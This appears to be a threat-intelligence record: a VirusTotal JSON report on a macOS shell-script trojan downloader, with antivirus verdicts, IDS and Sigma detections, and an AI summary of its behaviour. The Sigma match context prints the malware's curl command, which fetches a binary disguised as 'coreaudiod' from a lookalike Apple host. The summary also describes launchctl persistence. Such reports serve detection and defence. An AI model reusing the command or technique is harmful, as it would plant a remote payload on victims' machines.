425dbed05e53394a719c6e0986a9ce87
Hash
- MD5: 425dbed05e53394a719c6e0986a9ce87
- SHA1: e581b38c6d4e659742839f3025a2add0a7e3fe60
- SHA256: 9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a
- First Seen: 2026-05-27
- Last Seen: 2026-05-27
-
1
Related Reports
-
0
Related IOCs
Additional Information
VirusTotal
{
"data": {
"id": "9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a",
"type": "file",
"links": {
"self": "https://www.virustotal.com/api/v3/files/9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a"
},
"attributes": {
"crowdsourced_ids_results": [
{
"rule_category": "protocol-command-decode",
"alert_severity": "low",
"rule_msg": "(tcp) experimental TCP options found",
"rule_id": "116:58",
"rule_source": "Snort registered user ruleset",
"rule_url": "https://www.snort.org/downloads/#rule-downloads",
"rule_raw": "alert ( gid:116; sid:58; rev:2; msg:\"(tcp) experimental TCP options found\"; metadata: policy max-detect-ips drop, rule-type decode; classtype:protocol-command-decode;)",
"alert_context": [
{
"dest_ip": "8.8.4.4",
"dest_port": 443
}
]
},
{
"rule_category": "Misc activity",
"alert_severity": "low",
"rule_msg": "ET INFO Observed Google DNS over HTTPS Domain (dns .google in TLS SNI)",
"rule_id": "1:2047866",
"rule_source": "Proofpoint Emerging Threats Open",
"rule_url": "https://rules.emergingthreats.net/",
"rule_raw": "alert tls $HOME_NET any -> $EXTERNAL_NET any (msg:\"ET INFO Observed Google DNS over HTTPS Domain (dns .google in TLS SNI)\"; flow:established,to_server; threshold: type both, track by_src, count 1, seconds 600; tls.sni; dotprefix; content:\".dns.google\"; endswith; reference:url,developers.google.com/speed/public-dns/docs/doh/; classtype:misc-activity; sid:2047866; rev:4; metadata:affected_product Any, attack_target Client_Endpoint, created_at 2022_02_07, deployment Perimeter, performance_impact Low, confidence High, signature_severity Informational, tag DoH, updated_at 2023_10_05, reviewed_at 2023_10_05, former_sid 2851058; target:src_ip;)",
"rule_references": [
"https://developers.google.com/speed/public-dns/docs/doh/"
],
"alert_context": [
{
"dest_ip": "8.8.4.4",
"dest_port": 443,
"ja3": [
"fb3660676bafc9799c86bd51a1ea12f5"
],
"ja3s": [
"eb1d94daa7e0344597e756a1fb6e7054"
]
}
]
}
],
"last_submission_date": 1776192023,
"tags": [
"shell",
"detect-debug-environment",
"long-sleeps"
],
"last_analysis_stats": {
"malicious": 17,
"suspicious": 0,
"undetected": 40,
"harmless": 0,
"timeout": 4,
"confirmed-timeout": 0,
"failure": 1,
"type-unsupported": 13
},
"sha256": "9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a",
"crowdsourced_ids_stats": {
"high": 0,
"medium": 0,
"low": 2,
"info": 0
},
"first_seen_itw_date": 1776260447,
"type_tag": "shell",
"trid": [
{
"file_type": "Linux/UNIX shell script",
"probability": 70.0
},
{
"file_type": "Unix-like shebang (var.3) (gen)",
"probability": 30.0
}
],
"last_analysis_date": 1779901032,
"names": [],
"size": 3258,
"popular_threat_classification": {
"popular_threat_category": [
{
"count": 12,
"value": "trojan"
},
{
"count": 8,
"value": "downloader"
},
{
"count": 1,
"value": "dropper"
}
],
"suggested_threat_label": "trojan.shell/rnkl",
"popular_threat_name": [
{
"count": 2,
"value": "shell"
},
{
"count": 1,
"value": "rnkl"
}
]
},
"sandbox_verdicts": {
"Zenbox macOS": {
"category": "harmless",
"malware_classification": [
"CLEAN"
],
"sandbox_name": "Zenbox macOS",
"confidence": 100
}
},
"type_extension": "sh",
"md5": "425dbed05e53394a719c6e0986a9ce87",
"tlsh": "T1D4611CD0B5059828531B10FABE53329937A2126FAE571A30409FF177B7267D8F3AC865",
"type_tags": [
"script",
"shell",
"Bash"
],
"unique_sources": 1,
"type_description": "Shell script",
"sha1": "e581b38c6d4e659742839f3025a2add0a7e3fe60",
"times_submitted": 1,
"first_submission_date": 1776192023,
"filecondis": {
"dhash": "fca8e898ac900080",
"raw_md5": "ca1c7662fa4865c606ffe60f9b5dd41a"
},
"sigma_analysis_results": [
{
"rule_level": "medium",
"rule_id": "f92451c8957e89bb4e61e68433faeb8d7c1461c3b90d06b3403c8f3d87c728b8",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Usage Of Web Request Commands And Cmdlets",
"rule_description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine",
"rule_author": "James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger",
"match_context": [
{
"values": {
"CommandLine": "curl -fso /root/Library/Application Support/Microsoft/Teams/coreaudiod https://apple.driver-store.com/mac/intel/driver/coreaudiod",
"Image": "curl",
"EventID": "1"
}
}
]
},
{
"rule_level": "low",
"rule_id": "e576f496b0ac03c619b88124a419d2c717d3f5e3f5506a17e145443091bda155",
"rule_source": "Sigma Integrated Rule Set (GitHub)",
"rule_title": "Curl Usage on Linux",
"rule_description": "Detects a curl process start on linux, which indicates a file download from a remote location or a simple web request to a remote server",
"rule_author": "Nasreddine Bencherchali (Nextron Systems)",
"match_context": [
{
"values": {
"CommandLine": "/usr/bin/curl curl -fso \"/root/Library/Application Support/Microsoft/Teams/coreaudiod\" https://apple.driver-store.com/mac/intel/driver/coreaudiod",
"Image": "/usr/bin/curl",
"EventID": "1"
}
}
]
}
],
"magic": "Bourne-Again shell script, Unicode text, UTF-8 text executable",
"magika": "SHELL",
"last_analysis_results": {
"Bkav": {
"method": "blacklist",
"engine_name": "Bkav",
"engine_version": "8.2.40(8338)",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Lionic": {
"method": "blacklist",
"engine_name": "Lionic",
"engine_version": "8.16",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Shell.Agent.a!c"
},
"MicroWorld-eScan": {
"method": "blacklist",
"engine_name": "MicroWorld-eScan",
"engine_version": "14.0.409.0",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Generic.39933392"
},
"CTX": {
"method": "blacklist",
"engine_name": "CTX",
"engine_version": "2024.8.29.1",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"CAT-QuickHeal": {
"method": "blacklist",
"engine_name": "CAT-QuickHeal",
"engine_version": "22.00",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"ALYac": {
"method": "blacklist",
"engine_name": "ALYac",
"engine_version": "2.0.0.10",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Generic.39933392"
},
"Malwarebytes": {
"method": "blacklist",
"engine_name": "Malwarebytes",
"engine_version": "3.1.0.235",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"VIPRE": {
"method": "blacklist",
"engine_name": "VIPRE",
"engine_version": "6.0.0.35",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Generic.39933392"
},
"K7AntiVirus": {
"method": "blacklist",
"engine_name": "K7AntiVirus",
"engine_version": "14.54.59634",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"K7GW": {
"method": "blacklist",
"engine_name": "K7GW",
"engine_version": "14.54.59634",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"CrowdStrike": {
"method": "blacklist",
"engine_name": "CrowdStrike",
"engine_version": "1.0",
"engine_update": "20251219",
"category": "undetected",
"result": null
},
"VirIT": {
"method": "blacklist",
"engine_name": "VirIT",
"engine_version": "9.5.1216",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Symantec": {
"method": "blacklist",
"engine_name": "Symantec",
"engine_version": "1.22.0.0",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"ESET-NOD32": {
"method": "blacklist",
"engine_name": "ESET-NOD32",
"engine_version": "18.2.18.0",
"engine_update": "20260527",
"category": "malicious",
"result": "OSX/TrojanDownloader.Agent.CI trojan"
},
"TrendMicro-HouseCall": {
"method": "blacklist",
"engine_name": "TrendMicro-HouseCall",
"engine_version": "24.550.0.1002",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Avast": {
"method": "blacklist",
"engine_name": "Avast",
"engine_version": "23.9.8494.0",
"engine_update": "20260527",
"category": "malicious",
"result": "MacOS:Downloader-GK [Drp]"
},
"ClamAV": {
"method": "blacklist",
"engine_name": "ClamAV",
"engine_version": "1.5.2.0",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Kaspersky": {
"method": "blacklist",
"engine_name": "Kaspersky",
"engine_version": "22.0.1.28",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan-Downloader.Shell.Agent.lo"
},
"BitDefender": {
"method": "blacklist",
"engine_name": "BitDefender",
"engine_version": "7.2",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Generic.39933392"
},
"NANO-Antivirus": {
"method": "blacklist",
"engine_name": "NANO-Antivirus",
"engine_version": "1.0.170.26895",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"ViRobot": {
"method": "blacklist",
"engine_name": "ViRobot",
"engine_version": "2014.3.20.0",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Rising": {
"method": "blacklist",
"engine_name": "Rising",
"engine_version": "25.0.0.28",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Sophos": {
"method": "blacklist",
"engine_name": "Sophos",
"engine_version": "3.5.1.0",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"F-Secure": {
"method": "blacklist",
"engine_name": "F-Secure",
"engine_version": "18.10.1547.307",
"engine_update": "20260527",
"category": "malicious",
"result": "Dropper.DR/OSX.Downloader.GK"
},
"DrWeb": {
"method": "blacklist",
"engine_name": "DrWeb",
"engine_version": "7.0.75.2070",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Zillya": {
"method": "blacklist",
"engine_name": "Zillya",
"engine_version": "2.0.0.5609",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"TrendMicro": {
"method": "blacklist",
"engine_name": "TrendMicro",
"engine_version": "24.550.0.1002",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"McAfeeD": {
"method": "blacklist",
"engine_name": "McAfeeD",
"engine_version": "1.2.0.14532",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"CMC": {
"method": "blacklist",
"engine_name": "CMC",
"engine_version": "2.4.2022.1",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Emsisoft": {
"method": "blacklist",
"engine_name": "Emsisoft",
"engine_version": "2024.8.0.61147",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Generic.39933392 (B)"
},
"huorong": {
"method": "blacklist",
"engine_name": "huorong",
"engine_version": "8019ebe:8019ebe:4ac772e:4ac772e",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"GData": {
"method": "blacklist",
"engine_name": "GData",
"engine_version": "GD:27.44696AVA:64.31316",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Generic.39933392"
},
"Jiangmin": {
"method": "blacklist",
"engine_name": "Jiangmin",
"engine_version": "16.0.100",
"engine_update": "20260526",
"category": "undetected",
"result": null
},
"Varist": {
"method": "blacklist",
"engine_name": "Varist",
"engine_version": "6.6.1.3",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Avira": {
"method": "blacklist",
"engine_name": "Avira",
"engine_version": "8.3.3.24",
"engine_update": "20260527",
"category": "malicious",
"result": "DR/OSX.Downloader.GK"
},
"Antiy-AVL": {
"method": "blacklist",
"engine_name": "Antiy-AVL",
"engine_version": "3.0",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Kingsoft": {
"method": "blacklist",
"engine_name": "Kingsoft",
"engine_version": "None",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Gridinsoft": {
"method": "blacklist",
"engine_name": "Gridinsoft",
"engine_version": "1.0.246.174",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Xcitium": {
"method": "blacklist",
"engine_name": "Xcitium",
"engine_version": "38681",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Arcabit": {
"method": "blacklist",
"engine_name": "Arcabit",
"engine_version": "2025.0.0.23",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan.Generic.D26155D0"
},
"SUPERAntiSpyware": {
"method": "blacklist",
"engine_name": "SUPERAntiSpyware",
"engine_version": "5.6.0.1032",
"engine_update": "20260525",
"category": "undetected",
"result": null
},
"ZoneAlarm": {
"method": "blacklist",
"engine_name": "ZoneAlarm",
"engine_version": "6.25-116107068",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Microsoft": {
"method": "blacklist",
"engine_name": "Microsoft",
"engine_version": "1.1.26040.8",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Cynet": {
"method": "blacklist",
"engine_name": "Cynet",
"engine_version": "4.0.3.4",
"engine_update": "20260527",
"category": "malicious",
"result": "Malicious (score: 99)"
},
"AhnLab-V3": {
"method": "blacklist",
"engine_name": "AhnLab-V3",
"engine_version": "3.30.0.10666",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Acronis": {
"method": "blacklist",
"engine_name": "Acronis",
"engine_version": "1.2.0.121",
"engine_update": "20240328",
"category": "undetected",
"result": null
},
"TACHYON": {
"method": "blacklist",
"engine_name": "TACHYON",
"engine_version": "2026-05-27.02",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Zoner": {
"method": "blacklist",
"engine_name": "Zoner",
"engine_version": "2.2.2.0",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Tencent": {
"method": "blacklist",
"engine_name": "Tencent",
"engine_version": "1.0.0.1",
"engine_update": "20260527",
"category": "malicious",
"result": "Win32.Trojan-Downloader.Agent.Rnkl"
},
"Yandex": {
"method": "blacklist",
"engine_name": "Yandex",
"engine_version": "5.5.2.24",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"TrellixENS": {
"method": "blacklist",
"engine_name": "TrellixENS",
"engine_version": "6.0.6.653",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Ikarus": {
"method": "blacklist",
"engine_name": "Ikarus",
"engine_version": "6.4.16.0",
"engine_update": "20260527",
"category": "malicious",
"result": "Trojan-Downloader.OSX.Agent"
},
"MaxSecure": {
"method": "blacklist",
"engine_name": "MaxSecure",
"engine_version": "1.0.0.1",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"Fortinet": {
"method": "blacklist",
"engine_name": "Fortinet",
"engine_version": "7.0.48.0",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"AVG": {
"method": "blacklist",
"engine_name": "AVG",
"engine_version": "23.9.8494.0",
"engine_update": "20260527",
"category": "malicious",
"result": "MacOS:Downloader-GK [Drp]"
},
"Panda": {
"method": "blacklist",
"engine_name": "Panda",
"engine_version": "4.6.4.2",
"engine_update": "20260527",
"category": "undetected",
"result": null
},
"alibabacloud": {
"method": "blacklist",
"engine_name": "alibabacloud",
"engine_version": "2.2.0",
"engine_update": "20250321",
"category": "undetected",
"result": null
},
"Skyhigh": {
"method": "blacklist",
"engine_name": "Skyhigh",
"engine_version": null,
"engine_update": "20260527",
"category": "timeout",
"result": null
},
"Sangfor": {
"method": "blacklist",
"engine_name": "Sangfor",
"engine_version": "2.22.3.0",
"engine_update": "20260525",
"category": "timeout",
"result": null
},
"Google": {
"method": "blacklist",
"engine_name": "Google",
"engine_version": null,
"engine_update": "20260527",
"category": "timeout",
"result": null
},
"VBA32": {
"method": "blacklist",
"engine_name": "VBA32",
"engine_version": null,
"engine_update": "20260527",
"category": "timeout",
"result": null
},
"DeepInstinct": {
"method": "blacklist",
"engine_name": "DeepInstinct",
"engine_version": "5.0.0.8",
"engine_update": "20260527",
"category": "failure",
"result": null
},
"Avast-Mobile": {
"method": "blacklist",
"engine_name": "Avast-Mobile",
"engine_version": "260527-02",
"engine_update": "20260527",
"category": "type-unsupported",
"result": null
},
"SymantecMobileInsight": {
"method": "blacklist",
"engine_name": "SymantecMobileInsight",
"engine_version": "2.0",
"engine_update": "20260123",
"category": "type-unsupported",
"result": null
},
"BitDefenderFalx": {
"method": "blacklist",
"engine_name": "BitDefenderFalx",
"engine_version": "2.0.936",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"tehtris": {
"method": "blacklist",
"engine_name": "tehtris",
"engine_version": "v0.1.4",
"engine_update": "20260527",
"category": "type-unsupported",
"result": null
},
"Elastic": {
"method": "blacklist",
"engine_name": "Elastic",
"engine_version": "4.0.264",
"engine_update": "20260527",
"category": "type-unsupported",
"result": null
},
"APEX": {
"method": "blacklist",
"engine_name": "APEX",
"engine_version": "6.782",
"engine_update": "20260525",
"category": "type-unsupported",
"result": null
},
"Trapmine": {
"method": "blacklist",
"engine_name": "Trapmine",
"engine_version": "4.0.12.0",
"engine_update": "20260504",
"category": "type-unsupported",
"result": null
},
"Paloalto": {
"method": "blacklist",
"engine_name": "Paloalto",
"engine_version": "0.9.0.1003",
"engine_update": "20260527",
"category": "type-unsupported",
"result": null
},
"Alibaba": {
"method": "blacklist",
"engine_name": "Alibaba",
"engine_version": "0.3.0.5",
"engine_update": "20190527",
"category": "type-unsupported",
"result": null
},
"Webroot": {
"method": "blacklist",
"engine_name": "Webroot",
"engine_version": "1.9.0.8",
"engine_update": "20250227",
"category": "type-unsupported",
"result": null
},
"Cylance": {
"method": "blacklist",
"engine_name": "Cylance",
"engine_version": "3.0.0.0",
"engine_update": "20260521",
"category": "type-unsupported",
"result": null
},
"SentinelOne": {
"method": "blacklist",
"engine_name": "SentinelOne",
"engine_version": "7.6.2.19",
"engine_update": "20260324",
"category": "type-unsupported",
"result": null
},
"Trustlook": {
"method": "blacklist",
"engine_name": "Trustlook",
"engine_version": "1.0",
"engine_update": "20260527",
"category": "type-unsupported",
"result": null
}
},
"total_votes": {
"harmless": 0,
"malicious": 2
},
"ssdeep": "48:95UMB7LmcSKTSk0LQKtzd9tK0Io1+BubKJKt3liKluasvFKO+EN+h/Fcq:Hmcv+ZvyI8LkDl1swV/aq",
"sigma_analysis_stats": {
"critical": 0,
"high": 0,
"medium": 1,
"low": 1
},
"last_modification_date": 1779908387,
"reputation": -2,
"sigma_analysis_summary": {
"Sigma Integrated Rule Set (GitHub)": {
"critical": 0,
"high": 0,
"medium": 1,
"low": 1
}
},
"crowdsourced_ai_results": [
{
"source": "palm",
"verdict": "malicious",
"analysis": "The script gathers system information, including macOS version and audio hardware configuration. It terminates the system's core audio process and attempts to unload and reload the AppleHDA kernel extension. The script determines the system architecture (ARM or Intel) and uses `curl` to download a remote binary file from an external server. This file is saved to a specific application support directory, granted execution permissions, and registered as a background service via `launchctl` to be executed with the `--update` flag.",
"category": "code_insight",
"id": "9c2ce925133a3bf5a924063bbef8df49918d5b7258695c1894cd18c75970157a-file-palm"
}
]
}
}
}